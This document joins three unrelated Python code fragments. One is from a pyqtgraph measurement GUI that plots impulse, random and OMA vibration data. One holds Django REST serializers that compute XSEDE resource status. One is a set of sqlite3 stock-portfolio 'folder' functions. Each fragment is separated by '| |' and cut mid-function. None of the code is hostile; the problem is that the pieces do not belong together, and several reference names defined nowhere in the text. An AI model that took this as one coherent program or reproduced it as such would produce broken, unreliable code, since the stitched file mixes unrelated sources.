self.fig_h_phi_pen = [self.fig_h_phi.plot(pen=pg.mkPen({'color': self.colors[i]})) for i in range(len(self.settings['resp_channels']))]
self.fig_exc_zoom_pen = self.fig_exc_zoom.plot()
self.fig_exc_frq_pen = self.fig_exc_frq.plot()
self.legend.scene().removeItem(self.legend)
self.legend = self.fig_resp.addLegend()
# TODO: Before running the measurement check if everything is set. Make a funkction check_run and put it in __init__.
nr_ch = len(self.settings['resp_channels'])
resp_curves = [self.fig_resp.plot(
pen=pg.mkPen({'color': self.colors[i]}),
name='Ch {0} - {1}'.format(i, self.settings['channel_names'][self.settings['resp_channels'][i]]))
for i in range(nr_ch)]
# resp_curve = self.fig_resp.plot(pen='y')
self.fig_resp.enableAutoRange('x', True)
self.fig_resp.enableAutoRange('y', True)
self.n_averages_done = 0
# TODO: This must be made into an object. Too much mess using it this way.
# Plot update function - impulse measurement.
def plot_impulse(triggered, exc_curve, resp_curve, pipe,
exc_channel, resp_channels):
# mstimehere = time.time()
plotdata = pipe.recv()
# mstime, plotdata = pipe.recv()
resp = plotdata[resp_channels, :]
exc = plotdata[exc_channel, :]
exc_curve.setData(self.x_axis, exc)
# if double_hit_check(exc, self.x_axis[1]-self.x_axis[0]):
# self.button_doublehit.setStyleSheet('color: red')
# else:
# self.button_overload.setStyleSheet('color: lightgray')
if overload_check(exc):
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
# TODO: This should be faster.
overload_list = []
for i in range(resp.shape[0]):
overload_list.append(overload_check(resp[i, :]))
resp_curve[i].setData(self.x_axis, resp[i, :])
if True in overload_list:
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
if triggered.value:
# Stop measurement.
triggered.value = False
self.button_run.toggle()
# Sometimes measurement gives zeros. We have to retry the measurement.
if exc.sum() == 0.0:
self.button_run.toggle()
else:
# Show detailed data for impact type of measurement.
self.add_measurement_data(exc, resp)
def plot_random(triggered, exc_curve, resp_curve, pipe,
exc_channel, resp_channels, random_chunk):
# mstimehere = time.time()
plotdata = pipe.recv()
# mstime, plotdata = pipe.recv()
resp = plotdata[resp_channels, :]
exc = plotdata[exc_channel, :]
exc_curve.setData(self.x_axis, exc)
if overload_check(exc):
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
# TODO: This should be faster.
# print('Now drawing')
overload_list = []
for i in range(resp.shape[0]):
overload_list.append(overload_check(resp[i, :]))
resp_curve[i].setData(self.x_axis, resp[i, :])
if True in overload_list:
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
if triggered.value:
# print('Now Triggered')
triggered.value = False
chunk_data = random_chunk.recv()
resp = chunk_data[resp_channels, :]
exc = chunk_data[exc_channel, :]
self.add_measurement_data(exc, resp)
self.average_counter.setText('Pass {0} of {1}'.format(self.n_averages_done, self.settings['n_averages']))
if self.n_averages_done >= self.settings['n_averages']:
# TODO: Problems when stopping mid-measurement or for short windows!
# print(random_chunk.recv())
self.button_run.toggle()
def plot_oma(triggered, exc_curve, resp_curve, pipe,
exc_channel, resp_channels, random_chunk):
# mstimehere = time.time()
plotdata = pipe.recv()
# mstime, plotdata = pipe.recv()
resp = plotdata[resp_channels, :]
exc = plotdata[exc_channel, :]
if overload_check(exc):
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
exc_curve.setData(self.x_axis, exc)
# TODO: This should be faster.
# print('Now drawing')
overload_list = []
for i in range(resp.shape[0]):
overload_list.append(overload_check(resp[i, :]))
resp_curve[i].setData(self.x_axis, resp[i, :])
if True in overload_list:
self.button_overload.setStyleSheet('color: red')
else:
self.button_overload.setStyleSheet('color: lightgray')
if triggered.value:
# print('Now Triggered')
triggered.value = False
chunk_data = random_chunk.recv()
resp = chunk_data[:, :]
exc = chunk_data[exc_channel, :]
self.add_measurement_data(exc, resp)
self.average_counter.setText('Pass {0} of {1}'.format(self.n_averages_done, self.settings['n_averages']))
if self.n_averages_done >= self.settings['n_averages']:
# TODO: Problems when stopping mid-measurement or for short windows!
# print(random_chunk.recv())
self.button_run.toggle()
# Send over the settings, could be different, could be the same.
self.process.setup_measurement_parameters(self.settings)
for key in self.settings:
self.process.__dict__[key] = self.settings[key]
self.process.run_measurement()
sampling_fr = self.process.task_info_out.recv()
self.x_axis = np.arange(0, self.settings['samples_per_channel']/sampling_fr, 1/sampling_fr)
self.sampling_fr = sampling_fr
# Set up and start timed refresh. It must be a child of self (self.timer, not timer) otherwise it is
# unreferenced instantly.
self.timer = QtCore.QTimer()
print(self.settings['channel_delay'])
if self.settings['excitation_type'] == 'impulse':
# -- Initialize frf objects. For each channel.
self.frf_container = [frf.FRF(self.sampling_fr,
exc_type=self.settings['channel_types'][self.settings['exc_channel']],
resp_type=self.settings['channel_types'][self.settings['resp_channels'][i]],
exc_window=self.settings['exc_window'], resp_window=self.settings['resp_window'],
resp_delay=self.settings['channel_delay'][self.settings['resp_channels'][i]],
fft_len=self.settings['samples_per_channel']+self.settings['zero_padding'],
archive_time_data=self.settings['save_time_history']) for
i in range(len(self.settings['resp_channels']))]
# aa = [(self.settings['channel_types'][self.settings['resp_channels'][i]],
# self.settings['channel_delay'][self.settings['resp_channels'][i]])
# for i in range(len(self.settings['resp_channels']))]
# print(aa)
self.timer.timeout.connect(lambda triggered=self.process.triggered, exc_curve=exc_curve, resp_curve=resp_curves,
pipe=self.process.process_measured_data_out,
exc_channel=self.settings['exc_channel'],
resp_channels=self.settings['resp_channels']:
plot_impulse(triggered, exc_curve, resp_curve, pipe, exc_channel, resp_channels))
self.timer.start(100)
elif self.settings['excitation_type'] == 'random':
self.frf_container = [frf.FRF(self.sampling_fr,
exc_type=self.settings['channel_types'][self.settings['exc_channel']],
resp_type=self.settings['channel_types'][self.settings['resp_channels'][i]],
exc_window=self.settings['exc_window'], resp_window=self.settings['resp_window'],
resp_delay=self.settings['channel_delay'][self.settings['resp_channels'][i]],
weighting=self.settings['weighting'], n_averages=self.settings['n_averages'],
fft_len=self.settings['samples_per_channel']+self.settings['zero_padding'],
archive_time_data=self.settings['save_time_history']) for
i in range(len(self.settings['resp_channels']))]
self.timer.timeout.connect(lambda triggered=self.process.triggered, exc_curve=exc_curve, resp_curve=resp_curves,
pipe=self.process.process_measured_data_out,
exc_channel=self.settings['exc_channel'],
resp_channels=self.settings['resp_channels'],
random_chunk=self.process.process_random_chunk_out:
plot_random(triggered, exc_curve, resp_curve, pipe, exc_channel, resp_channels,
random_chunk))
self.timer.start(1000)
elif self.settings['excitation_type'] == 'oma':
self.frf_container = [frf.FRF(self.sampling_fr,
exc_type=self.settings['channel_types'][self.settings['exc_channel']],
resp_type=self.settings['channel_types'][i],
exc_window=self.settings['exc_window'], resp_window=self.settings['resp_window'],
resp_delay=self.settings['channel_delay'][i],
weighting=self.settings['weighting'], n_averages=self.settings['n_averages'],
fft_len=self.settings['samples_per_channel']+self.settings['zero_padding'],
archive_time_data=self.settings['save_time_history']) for
i in range(len(self.settings['resp_channels'])+1)]
self.timer.timeout.connect(lambda triggered=self.process.triggered, exc_curve=exc_curve, resp_curve=resp_curves,
pipe=self.process.process_measured_data_out,
exc_channel=self.settings['exc_channel'],
resp_channels=self.settings['resp_channels'],
random_chunk=self.process.process_random_chunk_out:
plot_oma(triggered, exc_curve, resp_curve, pipe, exc_channel, resp_channels,
random_chunk))
self.timer.start(1000)
def add_measurement_data(self, excitation, response):
"""Show | |
<reponame>XSEDE/XSEDE_Information_Warehouse
from django.urls import reverse, get_script_prefix
from django.utils.encoding import uri_to_iri
from django.utils import timezone
from rest_framework import serializers
from rest_framework.relations import PrimaryKeyRelatedField
from glue2_db.models import ComputingManager, ComputingManagerAcceleratorInfo, ComputingShare
from rdr_db.models import RDRResource
from monitoring_db.models import TestResult
from outages.models import Outages
from processing_status.models import ProcessingRecord
import datetime
class Resource_Status_Serializer(serializers.Serializer):
# Resource identifiers and descriptions
ResourceID = serializers.CharField(source='info_resourceid')
SiteID = serializers.CharField(source='info_siteid')
DisplayName = serializers.CharField(source='resource_descriptive_name')
ProjectAffiliation = serializers.CharField(source='project_affiliation')
ProviderLevel = serializers.CharField(source='provider_level')
RDR_Label = ''
RDR_Summary = ''
RDR_Declared_Status = serializers.SerializerMethodField()
Outage_Label = ''
Outage_Summary = ''
Outage_Status = serializers.SerializerMethodField()
Monitor_Label = ''
Monitor_Summary = ''
Monitoring_Status = serializers.SerializerMethodField()
Overall_Status = serializers.SerializerMethodField()
def get_RDR_Declared_Status(self, RDRResource):
if RDRResource.latest_status in ['production']:
self.RDR_Label = 'Green'
elif RDRResource.latest_status in ['post-production', 'pre-production', 'friendly']:
self.RDR_Label = 'Yellow'
else:
self.RDR_Label = 'Red'
self.RDR_Summary = 'In "{}"'.format(RDRResource.latest_status)
if RDRResource.latest_status_begin:
self.RDR_Summary += ' starting {}'.format(RDRResource.latest_status_begin)
if RDRResource.latest_status_end:
self.RDR_Summary += ' until {}'.format(RDRResource.latest_status_end)
http_request = self.context.get("request")
if http_request:
RDR_URL = http_request.build_absolute_uri(uri_to_iri(reverse('rdr-detail-rdrid', args=[RDRResource.rdr_resource_id])))
else:
RDR_URL = ''
return {'Label': self.RDR_Label,
'Declared_Status': RDRResource.latest_status,
'Declared_Status_Begin': RDRResource.latest_status_begin,
'Declared_Status_End': RDRResource.latest_status_end,
'Summary': self.RDR_Summary,
'References_URLs': RDR_URL}
def get_Outage_Status(self, RDRResource):
now = timezone.now()
outsearch = Outages.objects.filter(ResourceID=RDRResource.info_resourceid, OutageStart__lte=now, OutageEnd__gte=now)
outurls = set()
Full_Outage = False
http_request = self.context.get("request")
for out in outsearch:
if http_request:
outurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('outages-detail', args=[out.OutageID]))))
if out.OutageType.upper() == 'FULL':
Full_Outage = True
if Full_Outage:
self.Outage_Label = 'Red'
self.Outage_Summary = 'Full outage reported'
elif outsearch:
self.Outage_Label = 'Yellow'
self.Outage_Summary = 'Partial outage repoted (%s)' % len(outsearch)
else:
self.Outage_Label = 'Green'
self.Outage_Summary = ''
return {'Label': self.Outage_Label,
'Summary': self.Outage_Summary,
'References_URLs': outurls}
def get_Monitoring_Status(self, RDRResource):
monsearch = TestResult.objects.filter(ResourceID=RDRResource.info_resourceid)
monfail = set()
monurls = set()
http_request = self.context.get("request")
for mon in monsearch:
if mon.Result.upper() in ['PASS', 'SUCCESS']:
continue
monfail.add(mon.ID)
if http_request:
monurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('testresult-detail', args=[mon.ID]))))
if not monfail:
self.Monitor_Label = 'Green'
elif len(monfail) < len(monsearch):
self.Monitor_Label = 'Yellow'
self.Monitor_Summary = '%s of %s tests failing' % (len(monfail), len(monsearch))
else:
self.Monitor_Label = 'Red'
self.Monitor_Summary = 'All %s tests failing' % len(monfail)
return {'Label': self.Monitor_Label,
'Summary': self.Monitor_Summary,
'Reference_URLs': monurls}
def get_Overall_Status(self, RDRResource):
# Overall Status algorithm
# Red: RDR declared status is not Green(production) or Yellow(pre-production, post-production, friendly)
# or Red(FULL) outage declared
# or Red(ALL) tests are failing
# Yellow: Yellow(PARTIAL) outage declared
# or Yellow(SOME) tests are failing
# Green: Green everything
# allowing RDR declared Yellow(pre-production, post-production, friendly)
Summary_Items = []
Summary_Severity = 0
if self.RDR_Label not in ['Green', 'Yellow']:
Summary_Items.append(self.RDR_Summary)
Summary_Severity = max(2, Summary_Severity)
if self.Outage_Label == 'Red':
Summary_Items.append(self.Outage_Summary)
Summary_Severity = max(2, Summary_Severity)
if self.Monitor_Label == 'Red':
Summary_Items.append(self.Monitor_Summary)
Summary_Severity = max(2, Summary_Severity)
if Summary_Severity == 0:
# RDR_Label in ['Green', 'Yellow'] and Outage_Label != 'Red' and Monitor_Label != 'Red'
if self.Outage_Label == 'Yellow':
Summary_Items.append(self.Outage_Summary)
Summary_Severity = max(1, Summary_Severity)
if self.Monitor_Label == 'Yellow':
Summary_Items.append(self.Monitor_Summary)
Summary_Severity = max(1, Summary_Severity)
if Summary_Severity == 0:
Summary_Items.append('System operating normally')
return {'Label': ['Green', 'Yellow', 'Red'][Summary_Severity],
'Summary': '; '.join(Summary_Items),
'Status_at': timezone.now()}
class Meta:
model = RDRResource
fields = ('rdr_resource_id', 'rdr_type', 'info_resourceid', 'info_siteid',
'resource_descriptive_name', 'resource_status', 'current_statuses',
'latest_status', 'latest_status_begin', 'latest_status_end',
'project_affiliation', 'provider_level')
class Resource_Ops_Status_Serializer(serializers.Serializer):
# Proposed REQUIRED/OPTIONAL rules and publishing Warning/Error states
# Software (modules) and service publishing using IPF is REQUIRED by all L1, L2, and L3 SPs.
# Queue information publishing using IPF IS REQUIRED by allocated L1 & L2 compute resources, OPTIONAL for everyone else.
# Job state changes are OPTIONAL by everyone.
# Software (module) and service publishing should be published at least DAILY.
# We would display a WARNING if they haven't published in over one day, and an ERROR if they haven't published in 3 days.
# Queue information should be published at least HOURLY.
# We would display a WARNING if they haven't published in over one hour, and an ERROR if they haven't published in 3 hours.
# Resource identifiers and descriptions
ResourceID = serializers.CharField(source='info_resourceid')
SiteID = serializers.CharField(source='info_siteid')
DisplayName = serializers.CharField(source='resource_descriptive_name')
ProjectAffiliation = serializers.CharField(source='project_affiliation')
ProviderLevel = serializers.CharField(source='provider_level')
RDR_Label = ''
RDR_Summary = ''
RDR_Declared_Status = serializers.SerializerMethodField()
Outage_Label = ''
Outage_Summary = ''
Outage_Status = serializers.SerializerMethodField()
Monitor_Label = ''
Monitor_Summary = ''
Monitoring_Status = serializers.SerializerMethodField()
Publishing_Label = ''
Publishing_Summary = ''
Publishing_Status = serializers.SerializerMethodField()
Overall_Status = serializers.SerializerMethodField()
def get_RDR_Declared_Status(self, RDRResource):
if RDRResource.latest_status in ['production']:
self.RDR_Label = 'Green'
elif RDRResource.latest_status in ['post-production', 'pre-production', 'friendly']:
self.RDR_Label = 'Yellow'
else:
self.RDR_Label = 'Red'
self.RDR_Summary = 'In "{}"'.format(RDRResource.latest_status)
if RDRResource.latest_status_begin:
self.RDR_Summary += ' starting {}'.format(RDRResource.latest_status_begin)
if RDRResource.latest_status_end:
self.RDR_Summary += ' until {}'.format(RDRResource.latest_status_end)
http_request = self.context.get("request")
if http_request:
RDR_URL = http_request.build_absolute_uri(uri_to_iri(reverse('rdr-detail-rdrid', args=[RDRResource.rdr_resource_id])))
else:
RDR_URL = ''
return {'Label': self.RDR_Label,
'Declared_Status': RDRResource.latest_status,
'Declared_Status_Begin': RDRResource.latest_status_begin,
'Declared_Status_End': RDRResource.latest_status_end,
'Summary': self.RDR_Summary,
'References_URLs': RDR_URL}
def get_Outage_Status(self, RDRResource):
now = timezone.now()
outsearch = Outages.objects.filter(ResourceID=RDRResource.info_resourceid, OutageStart__lte=now, OutageEnd__gte=now)
outurls = set()
Full_Outage = False
http_request = self.context.get("request")
for out in outsearch:
if http_request:
outurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('outages-detail', args=[out.OutageID]))))
if out.OutageType.upper() == 'FULL':
Full_Outage = True
if Full_Outage:
self.Outage_Label = 'Red'
self.Outage_Summary = 'Full outage reported'
elif outsearch:
self.Outage_Label = 'Yellow'
self.Outage_Summary = 'Partial outage repoted (%s)' % len(outsearch)
else:
self.Outage_Label = 'Green'
self.Outage_Summary = ''
return {'Label': self.Outage_Label,
'Summary': self.Outage_Summary,
'References_URLs': outurls}
def get_Monitoring_Status(self, RDRResource):
monsearch = TestResult.objects.filter(ResourceID=RDRResource.info_resourceid)
monfail = set()
monurls = set()
http_request = self.context.get("request")
for mon in monsearch:
if mon.Result.upper() in ['PASS', 'SUCCESS']:
continue
monfail.add(mon.ID)
if http_request:
monurls.add(http_request.build_absolute_uri(uri_to_iri(reverse('testresult-detail', args=[mon.ID]))))
if not monfail:
self.Monitor_Label = 'Green'
Monitor_Summary = ''
elif len(monfail) < len(monsearch):
self.Monitor_Label = 'Yellow'
self.Monitor_Summary = '%s of %s tests failing' % (len(monfail), len(monsearch))
else:
self.Monitor_Label = 'Red'
self.Monitor_Summary = 'All %s tests failing' % len(monfail)
return {'Label': self.Monitor_Label,
'Summary': self.Monitor_Summary,
'Reference_URLs': monurls}
def get_Publishing_Status(self, RDRResource):
pubsearch = ProcessingRecord.objects.filter(About=RDRResource.info_resourceid)
puberror = set()
pubwarning = set()
puburls = set()
http_request = self.context.get("request")
for pub in pubsearch:
add_url = False
if pub.ProcessingEnd:
delta = timezone.now() - pub.ProcessingEnd
else:
delta = timezone.now() - pub.ProcessingStart
if pub.Topic == 'glue2.applications':
if delta > datetime.timedelta(days=3):
puberror.add(pub)
add_url = True
elif delta > datetime.timedelta(days=1):
pubwarning.add(pub)
add_url = True
elif pub.Topic == 'glue2.compute':
if delta > datetime.timedelta(hours=3):
puberror.add(pub)
add_url = True
elif delta > datetime.timedelta(hours=1):
pubwarning.add(pub)
add_url = True
if pub.ProcessingCode != '0':
puberror.add(pub)
add_url = True
if http_request and add_url:
puburls.add(http_request.build_absolute_uri(uri_to_iri(reverse('processingrecord-detail', args=[pub.ID]))))
if not pubsearch: # Nothing published
self.Publishing_Label = 'Blue'
elif not puberror and not pubwarning:
self.Publishing_Label = 'Green'
elif puberror:
self.Publishing_Label = 'Red'
self.Publishing_Summary = 'Some published information is old or missing ({} of {})'.format(len(puberror), len(pubsearch))
else:
self.Publishing_Label = 'Yellow'
self.Publishing_Summary = 'Some published informaton is stale ({} of {})'.format(len(pubwarning), len(pubsearch))
return {'Label': self.Publishing_Label,
'Summary': self.Publishing_Summary,
'Reference_URLs': puburls}
def get_Overall_Status(self, RDRResource):
# Overall Status algorithm
# Red: RDR declared status is not Green(production) or Yellow(pre-production, post-production, friendly)
# or Red(FULL) outage declared
# or Red(ALL) tests are failing
# or Red(ANY) published information is old or missing)
# Yellow: Yellow(PARTIAL) outage declared
# or Yellow(SOME) tests are failing
# Green: Green everything
# allowing RDR Yellow(pre-production, post-production, friendly)
# allowing Publishing Yellow(stale information)
Summary_Items = []
Summary_Severity = 0
if self.RDR_Label not in ['Green', 'Yellow']:
Summary_Items.append(self.RDR_Summary)
Summary_Severity = max(2, Summary_Severity)
if self.Outage_Label == 'Red':
Summary_Items.append(self.Outage_Summary)
Summary_Severity = max(2, Summary_Severity)
if self.Monitor_Label == 'Red':
Summary_Items.append(self.Monitor_Summary)
Summary_Severity = max(2, Summary_Severity)
if self.Publishing_Label == 'Red':
Summary_Items.append(self.Publishing_Summary)
Summary_Severity = max(2, Summary_Severity)
if Summary_Severity == 0:
# RDR_Label in ['Green', 'Yellow'] and Outage_Label != 'Red' and Monitor_Label != 'Red' and Publishing_Label != 'Red'
if self.Outage_Label == 'Yellow':
Summary_Items.append(self.Outage_Summary)
Summary_Severity = max(1, Summary_Severity)
if self.Monitor_Label == 'Yellow':
Summary_Items.append(self.Monitor_Summary)
Summary_Severity = max(1, Summary_Severity)
if self.Publishing_Label == 'Yellow':
# Inform of Stale publishing without impacting the severity
Summary_Items.append(self.Publishing_Summary)
# Summary_Severity = max(1, Summary_Severity)
elif Summary_Severity == 0:
Summary_Items.append('System operating normally')
return {'Label': ['Green', 'Yellow', 'Red'][Summary_Severity],
'Summary': '; '.join(Summary_Items),
'Status_at': timezone.now()}
class Meta:
model = RDRResource
fields = ('rdr_resource_id', 'rdr_type', 'info_resourceid', 'info_siteid',
'resource_descriptive_name', 'resource_status', 'current_statuses',
'latest_status', 'latest_status_begin', 'latest_status_end',
'project_affiliation', 'provider_level')
class Resource_Batch_Status_Serializer(serializers.Serializer):
# Resource identifiers and descriptions
ResourceID = serializers.CharField(source='info_resourceid')
SiteID = serializers.CharField(source='info_siteid')
DisplayName = serializers.CharField(source='resource_descriptive_name')
ProjectAffiliation = serializers.CharField(source='project_affiliation')
ProviderLevel = serializers.CharField(source='provider_level')
# %utilization and free CPUs if available particularly and total jobs.
Computing_Manager_Info = serializers.SerializerMethodField()
Computing_Manager_Accelerator_Info = serializers.SerializerMethodField()
Computing_Share_Info = serializers.SerializerMethodField()
# Computing_Share_Accelerator_Info = serializers.SerializerMethodField()
# Computing_Queue_Info = serializers.SerializerMethodField()
def get_Computing_Manager_Info(self, RDRResource):
managers = ComputingManager.objects.filter(ResourceID=RDRResource.info_resourceid)
results = {}
# Should only have one
for man in managers:
results['TotalSlots'] = man.EntityJSON.get('TotalSlots', None)
results['SlotsUsedByLocalJobs'] = man.EntityJSON.get('SlotsUsedByLocalJobs', | |
+ js['status'])
else:
col_list.append(row[i])
else:
col_list.append(row[i])
answer = dict(zip(keys, col_list))
items.append(answer)
table = TableCls(items, html_attrs = {'width':'100%','border-spacing':0})
folder_options = ""
folder_options += '<option value="switch to">switch to</option>'
folder_options += '<option value="delete">delete</option>'
name_options = ""
for name in names:
if (name["pretty name"] != answer["folder name"]):
name_options += '<option value="{0}">{0}</option>'.format(name["pretty name"], name["pretty name"])
if (verbose):
print ("***\n")
return table.__html__(), column_options, name_options, folder_options
#endregion defaults
#region folder
def Add(symbol, verbose):
db_file = GetDB(verbose)
if (verbose):
print ("***")
print ("Add(1) symbol: {0}".format(symbol))
print ("Add(2) dbase: {0}".format(db_file))
result = CreateFolder(symbol, verbose)
if (result):
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Add(3) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Add(4) {0}".format(e))
return False
json_data = Company(symbol, verbose)
json_string = json.dumps(json_data)
c = conn.cursor()
c.execute("UPDATE folder SET json_string = (?) WHERE symbol = (?)", (json_string, symbol,))
dt = datetime.datetime.now()
c.execute("UPDATE folder SET update_time = (?) WHERE symbol = (?)", (dt.strftime("%m/%d/%y %H:%M"), symbol,))
conn.commit()
conn.close()
quote = QuoteTradier(symbol, verbose)
errors = []
if ("Error Message" in quote[0]):
errors.append([symbol, quote[0]['url'], quote[0]["Error Message"]])
else:
Price(symbol, quote[0], verbose)
Shares(symbol, None, verbose)
if (verbose):
if (errors):
pprint.pprint(errors)
print ("***\n")
return True
def Remove(symbol, verbose):
db_file = GetDB(verbose)
if (verbose):
print ("***")
print ("Remove(1) symbol: {0}".format(symbol))
print ("Remove(2) dbase: {0}".format(db_file))
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Remove(3) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Remove(4) {0}".format(e))
return False
c = conn.cursor()
c.execute("DELETE FROM folder WHERE symbol=(?)", (symbol,))
conn.commit()
conn.close()
if (verbose):
print ("***\n")
return True
def Price(symbol, quote, verbose):
db_file = GetDB(verbose)
if (verbose):
print ("***")
print ("Price(1) symbol: {0}".format(symbol))
print ("Price(2) price: {0}".format(quote['price']))
print ("Price(3) quote: {0}".format(quote['quote']))
print ("Price(4) dbase: {0}".format(db_file))
result = CreateFolder(symbol, verbose)
if (result):
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Price(5) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Price(6) {0}".format(e))
return False
c = conn.cursor()
c.execute("UPDATE folder SET price = ? WHERE symbol = (?)", (quote['price'], symbol,))
c.execute("UPDATE folder SET quote = ? WHERE symbol = (?)", (quote['quote'], symbol,))
dt = datetime.datetime.now()
c.execute("UPDATE folder SET update_time = (?) WHERE symbol = (?)", (dt.strftime("%m/%d/%y %H:%M"), symbol,))
conn.commit()
conn.close()
if (verbose):
print ("***\n")
return True
def Cash(balance, verbose):
balance = to_number(balance, verbose)
db_file = GetDB(verbose)
if (verbose):
print ("***")
print ("Cash(1) balance: {0}".format(balance))
print ("Cash(2) dbase: {0}".format(db_file))
result = CreateFolder("$", verbose)
if (result):
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Cash(3) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Cash(4) {0}".format(e))
return False
c = conn.cursor()
c.execute("UPDATE folder SET balance = ? WHERE symbol = '$'", (round(float(balance), 2),))
dict_string = {'companyName': 'CASH', 'description': 'Cash Account', 'symbol': '$'}
json_string = json.dumps(dict_string)
c.execute("UPDATE folder SET json_string = (?) WHERE symbol = '$'", (json_string,))
c.execute("UPDATE folder SET shares = ? WHERE symbol = '$'", (round(float(balance), 4),))
dt = datetime.datetime.now()
c.execute("UPDATE folder SET update_time = (?) WHERE symbol = '$'", (dt.strftime("%m/%d/%y %H:%M"),))
c.execute("UPDATE folder SET price = 1.00 WHERE symbol = '$'")
conn.commit()
conn.close()
if (verbose):
print ("***\n")
return True
def GetFolderCount(verbose):
db_file = GetDB(verbose)
if (verbose):
print ("***")
if db_file == "":
if (verbose):
print ("GetFolderCount(1) could not get dbase name, make sure that the defaults dbase is set up")
return 0
if (verbose):
print ("GetFolderCount(2) dbase: {0}".format(db_file))
if (not os.path.exists(db_file)):
if (verbose):
print ("GetFolderCount(3) {0} file is missing, cannot return the row count".format(db_file))
print ("***\n")
return 0
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("GetFolderCount(4) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("GetFolderCount(5) {0}".format(e))
return 0
if (checkTableExists(conn, "folder")):
c = conn.cursor()
c.execute("select * from folder")
results = c.fetchall()
else:
results = ""
conn.close()
if (verbose):
print ("***\n")
return len(results)
def CreateFolder(key, verbose):
db_file = GetDB(verbose)
username = getpass.getuser()
Path(username + "/").mkdir(parents=True, exist_ok=True)
if (verbose):
print ("***")
print ("CreateFolder(1) dbase: {0}".format(db_file))
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("CreateFolder(2) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("CreateFolder(3) {0}".format(e))
return False
c = conn.cursor()
c.execute("CREATE TABLE if not exists 'folder' ( `symbol` TEXT NOT NULL UNIQUE, `balance` REAL, `shares` REAL, `price` NUMERIC, `quote` TEXT, `update_time` TEXT, `json_string` TEXT, PRIMARY KEY(`symbol`) )")
c.execute( "INSERT OR IGNORE INTO folder(symbol) VALUES((?))", (key,))
conn.commit()
conn.close()
count = GetFolderCount(verbose)
if (count == 1 and key != "$"):
Cash("0", verbose)
if (verbose):
print ("***\n")
return True
def Shares(symbol, shares, verbose):
result = {}
if shares is None:
shares = "0"
if (symbol == "$"):
Cash(shares, verbose)
result['status'] = True
result['shares'] = shares
return result
shares = to_number(shares, verbose)
db_file = GetDB(verbose)
username = getpass.getuser()
Path(username + "/").mkdir(parents=True, exist_ok=True)
if (verbose):
print ("***")
print ("Shares(1) symbol: {0}".format(symbol))
print ("Shares(2) shares: {0}".format(shares))
print ("Shares(3) dbase: {0}".format(db_file))
if (symbol == ""):
e = "Error: symbol cannot be blank"
print (e)
result['status'] = False
result['balance'] = 0
result['exception'] = e
return result
folder = GetFolder(verbose)
price = GetFolderValue(symbol, "price", folder)
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Shares(4) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Shares(5) {0}".format(e))
result['status'] = False
result['balance'] = 0
result['exception'] = e
return result
c = conn.cursor()
c.execute("UPDATE folder SET shares = ? WHERE symbol = (?)", (shares, symbol,))
balance = shares * price
c.execute("UPDATE folder SET balance = ? WHERE symbol = (?)", (balance, symbol,))
conn.commit()
conn.close()
if (verbose):
print ("***\n")
result['status'] = True
result['balance'] = balance
return result
def Balance(symbol, balance, verbose):
result = {}
if (balance is None):
balance = "0"
if (symbol == "$"):
Cash(balance, verbose)
result['status'] = True
result['shares'] = balance
return result
balance = to_number(balance, verbose)
db_file = GetDB(verbose)
username = getpass.getuser()
Path(username + "/").mkdir(parents=True, exist_ok=True)
if (verbose):
print ("***")
print ("Balance(1) symbol: {0}".format(symbol))
print ("Balance(2) balance: {0}".format(balance))
print ("Balance(3) dbase: {0}".format(db_file))
if (symbol == ""):
e = "Error: symbol cannot be blank"
print (e)
result['status'] = False
result['shares'] = 0
result['exception'] = e
return result
folder = GetFolder(verbose)
price = GetFolderValue(symbol, "price", folder)
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Balance(4) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Balance(5) {0}".format(e))
result['status'] = False
result['shares'] = 0
result['exception'] = e
return result
c = conn.cursor()
shares = 0
if (price is None):
price = 0
if price > 0:
shares = balance / price
c.execute("UPDATE folder SET shares = ? WHERE symbol = (?)", (shares, symbol,))
c.execute("UPDATE folder SET balance = ? WHERE symbol = (?)", (balance, symbol,))
conn.commit()
conn.close()
if (verbose):
print ("***\n")
result['status'] = True
result['shares'] = shares
return result
def Update(verbose):
db_file = GetDB(verbose)
username = getpass.getuser()
Path(username + "/").mkdir(parents=True, exist_ok=True)
if (verbose):
print ("***")
print ("Update(1) dbase: {0}".format(db_file))
try:
conn = sqlite3.connect(db_file)
if (verbose):
print("Update(2) sqlite3: {0}".format(sqlite3.version))
except Error as e:
print("Update(3) dbase: {0}, {1}".format(db_file, e))
return False, e
c = conn.cursor()
try:
c.execute("SELECT symbol, shares, balance FROM folder where symbol != '$' order by symbol")
except Error as e:
print("Update(4) dbase: {0}, {1}".format(db_file, e))
return False, e
rows = c.fetchall()
conn.commit()
conn.close()
quote_list = ""
for row in rows:
quote_list += row[0] + ","
quote_list = quote_list[:-1]
quotes = QuoteTradier(quote_list, verbose)
errors = []
if ("Error Message" in quotes[0]):
errors.append(quotes)
if errors == []:
for row in rows:
for quote in quotes:
if row[0] == quote["symbol"]:
result = Price(row[0], quote, verbose)
result = Shares(row[0], str(row[1]), verbose)
if (result['status']):
if (verbose):
print ("symbol: {0}, current shares: {1}, previous balance: {2}, current balance: {3}".format(row[0], row[1], row[2], result['balance']))
if (verbose):
if (errors):
pprint.pprint(errors)
print ("***\n")
return True, ""
def DayisOpen(verbose):
answer = False
d, t = GetDefaults(verbose)
